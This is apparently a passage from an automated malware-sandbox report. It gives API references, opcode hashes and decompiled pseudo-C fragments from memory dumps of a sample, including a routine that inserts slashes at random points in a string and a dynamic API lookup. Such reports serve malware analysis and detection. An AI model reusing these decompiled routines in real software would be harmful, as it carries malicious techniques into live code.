                                                                                                                                  • Opcode Fuzzy Hash: d53a7901f54c1b6d50589fb35c001e06f3f0e7164f72585eae965ce46c6b602e
                                                                                                                                  • Instruction Fuzzy Hash: 01214F7990020AEFCB11DFA8D984A9EBBB9FF49310F108169F941EB210EB34DA45CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                  • _free.LIBCMT ref: 6E92F2FB
                                                                                                                                  • _free.LIBCMT ref: 6E92F331
                                                                                                                                  • SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  • Opcode ID: 17665bf3b6df14f5611f976393e3f7e52ce38b4694d6c9b2aa4ca7b4c251ab38
                                                                                                                                  • Instruction ID: 0968982f0bf7dd37af59804bce30cbcf7c72255aa00c76726e50d22b7ea15124
                                                                                                                                  • Opcode Fuzzy Hash: 17665bf3b6df14f5611f976393e3f7e52ce38b4694d6c9b2aa4ca7b4c251ab38
                                                                                                                                  • Instruction Fuzzy Hash: 44110A32229A226EEF411AF59C84D9F329D9FD36BDB350D34F534A61D8EF60C8098D50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,6E918835,6E92F53A,?,?,6E8E565E,000008BB,6E97A0D4), ref: 6E92F3F5
                                                                                                                                  • _free.LIBCMT ref: 6E92F452
                                                                                                                                  • _free.LIBCMT ref: 6E92F488
                                                                                                                                  • SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,?,?,6E918835,6E92F53A,?,?,6E8E565E,000008BB,6E97A0D4), ref: 6E92F493
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  • Opcode ID: fc1311c86270baaea6892e4368129eacee1a1c6189304ff1ece7421417cfcd4b
                                                                                                                                  • Instruction ID: e73197dc68c5435c7b8b7e2190227aaa0a0fd879a24129ba6b53b217c5048673
                                                                                                                                  • Opcode Fuzzy Hash: fc1311c86270baaea6892e4368129eacee1a1c6189304ff1ece7421417cfcd4b
                                                                                                                                  • Instruction Fuzzy Hash: B411EC31628B116EEF611AF95C89D9B335DAFD267D7340934F534A63D8EFA0C8088920
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F039A
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03A6
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03B2
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03C1
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF95F
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF96B
                                                                                                                                  • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E8EF980
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF998
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2520070614-0
                                                                                                                                  • Opcode ID: 8242076e6a00f3fc3723176f8f108a9ecde104cf41b43a0bb57efa3f61300119
                                                                                                                                  • Instruction ID: bd4805fce96bbe2cfd29895ea3203faea78ddc504dfd8c8a12b470b951a0bd0d
                                                                                                                                  • Opcode Fuzzy Hash: 8242076e6a00f3fc3723176f8f108a9ecde104cf41b43a0bb57efa3f61300119
                                                                                                                                  • Instruction Fuzzy Hash: 48212AB1D0024CEFCB05CFD8C950BDDBBB9BF49318F108969E819AB694DB346A05CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F039A
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03A6
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03B2
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03C1
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF87F
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF88B
                                                                                                                                  • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E8EF8A0
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF8B8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2520070614-0
                                                                                                                                  • Opcode ID: c2083d6a0ca5c5cf9a6f8fe57b0dff93d0c75cd797d0c2b20cdb12e674f5bba4
                                                                                                                                  • Instruction ID: db557a30f8cc965092d4e6c18c08b6e3dd7fccf8fc736e3744d96081085fa78a
                                                                                                                                  • Opcode Fuzzy Hash: c2083d6a0ca5c5cf9a6f8fe57b0dff93d0c75cd797d0c2b20cdb12e674f5bba4
                                                                                                                                  • Instruction Fuzzy Hash: AA214AB1D0024CEFCB05CFD8C840BDEBBB9BF49318F008969E819AB694DB306A05CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E00A326DD(unsigned int __eax, void* __ecx) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				signed int _t21;
                                                                                                                                  				signed short _t23;
                                                                                                                                  				char* _t27;
                                                                                                                                  				void* _t29;
                                                                                                                                  				void* _t30;
                                                                                                                                  				unsigned int _t33;
                                                                                                                                  				void* _t37;
                                                                                                                                  				unsigned int _t38;
                                                                                                                                  				void* _t41;
                                                                                                                                  				void* _t42;
                                                                                                                                  				int _t45;
                                                                                                                                  				void* _t46;
                                                                                                                                  
                                                                                                                                  				_t42 = __eax;
                                                                                                                                  				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                                  				_t38 = __eax;
                                                                                                                                  				_t30 = RtlAllocateHeap( *0xa3d270, 0, (__eax >> 3) + __eax + 1);
                                                                                                                                  				_v12 = _t30;
                                                                                                                                  				if(_t30 != 0) {
                                                                                                                                  					_v8 = _t42;
                                                                                                                                  					do {
                                                                                                                                  						_t33 = 0x18;
                                                                                                                                  						if(_t38 <= _t33) {
                                                                                                                                  							_t33 = _t38;
                                                                                                                                  						}
                                                                                                                                  						_t21 =  *0xa3d288; // 0x7370bc02
                                                                                                                                  						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                                  						 *0xa3d288 = _t23;
                                                                                                                                  						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                                  						memcpy(_t30, _v8, _t45);
                                                                                                                                  						_v8 = _v8 + _t45;
                                                                                                                                  						_t27 = _t30 + _t45;
                                                                                                                                  						_t38 = _t38 - _t45;
                                                                                                                                  						_t46 = _t46 + 0xc;
                                                                                                                                  						 *_t27 = 0x2f;
                                                                                                                                  						_t13 = _t27 + 1; // 0x1
                                                                                                                                  						_t30 = _t13;
                                                                                                                                  					} while (_t38 > 8);
                                                                                                                                  					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                                  				}
                                                                                                                                  				return _v12;
                                                                                                                                  			}


















                                                                                                                                  APIs
                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00A31A07,00000000,?,?,00A34653,?,033A95B0), ref: 00A326E8
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00A32700
                                                                                                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00A31A07,00000000,?,?,00A34653,?,033A95B0), ref: 00A32744
                                                                                                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 00A32765
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1819133394-0
                                                                                                                                  • Opcode ID: 6817d391013c180bf5b5281f50a0b7756269eac90ff477e2fb82b5ae98c66dab
                                                                                                                                  • Instruction ID: d3a9a6517de75a0d1d91a4ade0b5776370acc1db8b6d2620f08386a86bb47720
                                                                                                                                  • Opcode Fuzzy Hash: 6817d391013c180bf5b5281f50a0b7756269eac90ff477e2fb82b5ae98c66dab
                                                                                                                                  • Instruction Fuzzy Hash: E811E972A00214BFC714CBA9ED84E9EBBBEEBC1360F150276F905D7151E6709E059760
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                  			E00A35AB2(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                  				intOrPtr _v36;
                                                                                                                                  				intOrPtr _v44;
                                                                                                                                  				intOrPtr _v48;
                                                                                                                                  				intOrPtr _v52;
                                                                                                                                  				void _v60;
                                                                                                                                  				char _v64;
                                                                                                                                  				intOrPtr _t18;
                                                                                                                                  				intOrPtr _t19;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				intOrPtr _t27;
                                                                                                                                  				long _t28;
                                                                                                                                  
                                                                                                                                  				_t27 = __edi;
                                                                                                                                  				_t26 = _a8;
                                                                                                                                  				_t28 = E00A31A9C(_a4, _t26, __edi);
                                                                                                                                  				if(_t28 != 0) {
                                                                                                                                  					memset( &_v60, 0, 0x38);
                                                                                                                                  					_t18 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  					_t28 = 0;
                                                                                                                                  					_v64 = 0x3c;
                                                                                                                                  					if(_a12 == 0) {
                                                                                                                                  						_t7 = _t18 + 0xa3e4e8; // 0x70006f
                                                                                                                                  						_t19 = _t7;
                                                                                                                                  					} else {
                                                                                                                                  						_t6 = _t18 + 0xa3e8f0; // 0x750072
                                                                                                                                  						_t19 = _t6;
                                                                                                                                  					}
                                                                                                                                  					_v52 = _t19;
                                                                                                                                  					_push(_t28);
                                                                                                                                  					_v48 = _a4;
                                                                                                                                  					_v44 = _t26;
                                                                                                                                  					_v36 = _t27;
                                                                                                                                  					E00A334C7();
                                                                                                                                  					_push( &_v64);
                                                                                                                                  					if( *0xa3d0e4() == 0) {
                                                                                                                                  						_t28 = GetLastError();
                                                                                                                                  					}
                                                                                                                                  					_push(1);
                                                                                                                                  					E00A334C7();
                                                                                                                                  				}
                                                                                                                                  				return _t28;
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A31A9C: SysAllocString.OLEAUT32(00000000), ref: 00A31AF6
                                                                                                                                    • Part of subcall function 00A31A9C: SysAllocString.OLEAUT32(0070006F), ref: 00A31B0A
                                                                                                                                    • Part of subcall function 00A31A9C: SysAllocString.OLEAUT32(00000000), ref: 00A31B1C
                                                                                                                                  • memset.NTDLL ref: 00A35AD5
                                                                                                                                  • GetLastError.KERNEL32 ref: 00A35B21
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocString$ErrorLastmemset
                                                                                                                                  • String ID: <$@MtNt
                                                                                                                                  • API String ID: 3736384471-2823972799
                                                                                                                                  • Opcode ID: 2667dcc55ebbc87f551e66535917fb9ac11c7744cc92b8a858fbb9373efca38c
                                                                                                                                  • Instruction ID: ce07f0ca35595468d31d2249e133ec00c47b23379f9eed37a08cc39c3d9b95a2
                                                                                                                                  • Opcode Fuzzy Hash: 2667dcc55ebbc87f551e66535917fb9ac11c7744cc92b8a858fbb9373efca38c
                                                                                                                                  • Instruction Fuzzy Hash: 88015E71D00618AFDB11EFE8ED85EDEBBB8AF08780F044526F908E7251E770D9018BA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1E36
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1E43
                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E8F1E80
                                                                                                                                    • Part of subcall function 6E8F0FAE: _Yarn.LIBCPMT ref: 6E8F0FCD
                                                                                                                                    • Part of subcall function 6E8F0FAE: _Yarn.LIBCPMT ref: 6E8F0FF1
                                                                                                                                  • std::exception::exception.LIBCMTD ref: 6E8F1EA5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2425033533-0
                                                                                                                                  • Opcode ID: 58c68a8cb1911bc2331c71e0a53f10dd197e7aee479de4d9163249f95665cfd4
                                                                                                                                  • Instruction ID: 84bc7622b8dd86b95011762930e5fef9f71cad178bb29a326bb75f629c6d9a3e
                                                                                                                                  • Opcode Fuzzy Hash: 58c68a8cb1911bc2331c71e0a53f10dd197e7aee479de4d9163249f95665cfd4
                                                                                                                                  • Instruction Fuzzy Hash: BD015BB1405B44DFC7208FAA848058AFAE4BF29254B908D6FE58987A01D730D545CB99
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A34450() {
                                                                                                                                  				void* _t1;
                                                                                                                                  				intOrPtr _t5;
                                                                                                                                  				void* _t6;
                                                                                                                                  				void* _t7;
                                                                                                                                  				void* _t11;
                                                                                                                                  
                                                                                                                                  				_t1 =  *0xa3d2a4; // 0x208
                                                                                                                                  				if(_t1 == 0) {
                                                                                                                                  					L8:
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				SetEvent(_t1);
                                                                                                                                  				_t11 = 0x7fffffff;
                                                                                                                                  				while(1) {
                                                                                                                                  					SleepEx(0x64, 1);
                                                                                                                                  					_t5 =  *0xa3d2f4; // 0x0
                                                                                                                                  					if(_t5 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t11 = _t11 - 0x64;
                                                                                                                                  					if(_t11 > 0) {
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					break;
                                                                                                                                  				}
                                                                                                                                  				_t6 =  *0xa3d2a4; // 0x208
                                                                                                                                  				if(_t6 != 0) {
                                                                                                                                  					CloseHandle(_t6);
                                                                                                                                  				}
                                                                                                                                  				_t7 =  *0xa3d270; // 0x2fb0000
                                                                                                                                  				if(_t7 != 0) {
                                                                                                                                  					HeapDestroy(_t7);
                                                                                                                                  				}
                                                                                                                                  				goto L8;
                                                                                                                                  			}









                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(00000208,00000001,00A3191C), ref: 00A3445B
                                                                                                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 00A3446A
                                                                                                                                  • CloseHandle.KERNEL32(00000208), ref: 00A3448B
                                                                                                                                  • HeapDestroy.KERNEL32(02FB0000), ref: 00A3449B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4109453060-0
                                                                                                                                  • Opcode ID: 81031d92dc8aff7099652bcc4963c58ee41eb4dbb100083868efd3670c5704df
                                                                                                                                  • Instruction ID: f8b9397d412f0b79c35ffb3763cf4196198fdae943e33f843d1a17b14992c1f4
                                                                                                                                  • Opcode Fuzzy Hash: 81031d92dc8aff7099652bcc4963c58ee41eb4dbb100083868efd3670c5704df
                                                                                                                                  • Instruction Fuzzy Hash: CFF0C076B01352DBDF24DBF5FD88B4736ACEB09771F054520B815E75A0DB24E8468A60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free
                                                                                                                                  • String ID: -
                                                                                                                                  • API String ID: 269201875-2547889144
                                                                                                                                  • Opcode ID: 6530cb2c14446d5867c15bb2c077cf7cc701484ca49d6d32cf54dd982df9c047
                                                                                                                                  • Instruction ID: 39835b0edfa9c604f16208a467f4e7223842532e9d05214564326cd04fe60ae8
                                                                                                                                  • Opcode Fuzzy Hash: 6530cb2c14446d5867c15bb2c077cf7cc701484ca49d6d32cf54dd982df9c047
                                                                                                                                  • Instruction Fuzzy Hash: 57C1C2319042369ADB649FE4CC50BEA73BDFF65718F3045AAD80697284EB31DA81CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 6E927B2D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                  • String ID: pow
                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                  • Opcode ID: 649c906b493a2fc5f51125b8765dfe8488a923f44d8fb3a044b036afc0c7930b
                                                                                                                                  • Instruction ID: bf31e69305876a649dd19c868a5efa82f2a87730dfe5c88523ab3639ef6db876
                                                                                                                                  • Opcode Fuzzy Hash: 649c906b493a2fc5f51125b8765dfe8488a923f44d8fb3a044b036afc0c7930b
                                                                                                                                  • Instruction Fuzzy Hash: AF517961A2C102DEDF81B6E4C9503AB7BACDF41750F304D79F8A1922DCEB32C4919E86
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E6E8D1AD7(void* __ecx, WCHAR** _a4) {
                                                                                                                                  				struct HINSTANCE__* _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				long _t10;
                                                                                                                                  				long _t19;
                                                                                                                                  				long _t20;
                                                                                                                                  				WCHAR* _t23;
                                                                                                                                  
                                                                                                                                  				_v8 =  *0x6e8d41b0;
                                                                                                                                  				_t19 = 0x104;
                                                                                                                                  				_t23 = E6E8D1000(0x208);
                                                                                                                                  				if(_t23 == 0) {
                                                                                                                                  					L8:
                                                                                                                                  					_t20 = 8;
                                                                                                                                  					L9:
                                                                                                                                  					return _t20;
                                                                                                                                  				} else {
                                                                                                                                  					goto L1;
                                                                                                                                  				}
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t10 = GetModuleFileNameW(_v8, _t23, _t19);
                                                                                                                                  					_v12 = _t10;
                                                                                                                                  					if(_t10 == 0 || _t19 != _t10) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t19 = _t19 + 0x104;
                                                                                                                                  					E6E8D1397(_t23);
                                                                                                                                  					_t23 = E6E8D1000(_t19 + _t19);
                                                                                                                                  					if(_t23 != 0) {
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					break;
                                                                                                                                  				}
                                                                                                                                  				_t20 = 0;
                                                                                                                                  				if(_t23 == 0) {
                                                                                                                                  					goto L8;
                                                                                                                                  				}
                                                                                                                                  				if(_v12 == 0) {
                                                                                                                                  					_t20 = GetLastError();
                                                                                                                                  					E6E8D1397(_t23);
                                                                                                                                  				} else {
                                                                                                                                  					 *_a4 = _t23;
                                                                                                                                  				}
                                                                                                                                  				goto L9;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8D1000: HeapAlloc.KERNEL32(00000000,?,6E8D15ED,00000030,74E063F0,00000000), ref: 6E8D100C
                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,?,6E8D1668,?), ref: 6E8D1B00
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,6E8D1668,?), ref: 6E8D1B3E
                                                                                                                                    • Part of subcall function 6E8D1397: HeapFree.KERNEL32(00000000,?,6E8D1B4C,00000000,?,?,?,6E8D1668,?), ref: 6E8D13A3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocErrorFileFreeLastModuleName
                                                                                                                                  • String ID: @Mt MtTt
                                                                                                                                  • API String ID: 1691993961-608512568
                                                                                                                                  • Opcode ID: fb2ad383cd86aec500801090b990194066a034b06d813e32bd8bc8f4fbbcd422
                                                                                                                                  • Instruction ID: 67ab2555c84f5ff2cca0159c9b0d8cfb84315480c168cb117b6b9842931a19a2
                                                                                                                                  • Opcode Fuzzy Hash: fb2ad383cd86aec500801090b990194066a034b06d813e32bd8bc8f4fbbcd422
                                                                                                                                  • Instruction Fuzzy Hash: 8001D472A40A1AABCB5197ED8C44D9F7EACDF86794B014922E90497280FB70CC4C87E0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3117A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                                  				struct _FILETIME _v12;
                                                                                                                                  				void* _t11;
                                                                                                                                  				short _t19;
                                                                                                                                  				void* _t22;
                                                                                                                                  				void* _t24;
                                                                                                                                  				void* _t25;
                                                                                                                                  				short* _t26;
                                                                                                                                  
                                                                                                                                  				_t24 = __edx;
                                                                                                                                  				_t25 = E00A31922(_t11, _a12);
                                                                                                                                  				if(_t25 == 0) {
                                                                                                                                  					_t22 = 8;
                                                                                                                                  				} else {
                                                                                                                                  					_t26 = _t25 + _a16 * 2;
                                                                                                                                  					 *_t26 = 0;
                                                                                                                                  					_t22 = E00A39371(__ecx, _a4, _a8, _t25);
                                                                                                                                  					if(_t22 == 0) {
                                                                                                                                  						GetSystemTimeAsFileTime( &_v12);
                                                                                                                                  						_t19 = 0x5f;
                                                                                                                                  						 *_t26 = _t19;
                                                                                                                                  						_t22 = E00A34A6D(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                                                                                                                  					}
                                                                                                                                  					HeapFree( *0xa3d270, 0, _t25);
                                                                                                                                  				}
                                                                                                                                  				return _t22;
                                                                                                                                  			}











                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A31922: lstrlen.KERNEL32(?,00000000,033A9B38,00000000,00A374FF,033A9D16,?,?,?,?,?,69B25F44,00000005,00A3D00C), ref: 00A31929
                                                                                                                                    • Part of subcall function 00A31922: mbstowcs.NTDLL ref: 00A31952
                                                                                                                                    • Part of subcall function 00A31922: memset.NTDLL ref: 00A31964
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,033A9364), ref: 00A311B2
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,033A9364), ref: 00A311E0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 1500278894-8415677
                                                                                                                                  • Opcode ID: 6f151cb1257a29855bf7228dffc10df275fdd9ee62129c82dc695cfad18fd1c5
                                                                                                                                  • Instruction ID: 8243944e90222b1512eda0d91420cba0baa04cd0d5078f526623bca3f84ed309
                                                                                                                                  • Opcode Fuzzy Hash: 6f151cb1257a29855bf7228dffc10df275fdd9ee62129c82dc695cfad18fd1c5
                                                                                                                                  • Instruction Fuzzy Hash: E3018F36210209BBDB215FE5EC45EEF7B78FF89754F10042AFA40AA161DAB1D925C760
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E00A327C7(void* __ecx) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				_Unknown_base(*)()* _t9;
                                                                                                                                  				signed int _t11;
                                                                                                                                  				intOrPtr _t12;
                                                                                                                                  				struct HINSTANCE__* _t14;
                                                                                                                                  				intOrPtr _t17;
                                                                                                                                  				intOrPtr _t20;
                                                                                                                                  
                                                                                                                                  				_t9 =  *0xa3d2d8;
                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                  				_t20 =  *0xa3d28c; // 0x20c
                                                                                                                                  				if(_t9 != 0) {
                                                                                                                                  					L2:
                                                                                                                                  					if(_t20 != 0) {
                                                                                                                                  						_t11 =  *_t9(_t20,  &_v8);
                                                                                                                                  						if(_t11 == 0) {
                                                                                                                                  							_v8 = _v8 & _t11;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					L5:
                                                                                                                                  					return _v8;
                                                                                                                                  				}
                                                                                                                                  				_t12 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  				_t3 = _t12 + 0xa3e0af; // 0x4e52454b
                                                                                                                                  				_t14 = GetModuleHandleA(_t3);
                                                                                                                                  				_t17 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  				_t4 = _t17 + 0xa3e9ea; // 0x6f577349
                                                                                                                                  				 *0xa3d2ac = _t14;
                                                                                                                                  				_t9 = GetProcAddress(_t14, _t4);
                                                                                                                                  				 *0xa3d2d8 = _t9;
                                                                                                                                  				if(_t9 == 0) {
                                                                                                                                  					goto L5;
                                                                                                                                  				}
                                                                                                                                  				goto L2;
                                                                                                                                  			}










                                                                                                                                  APIs
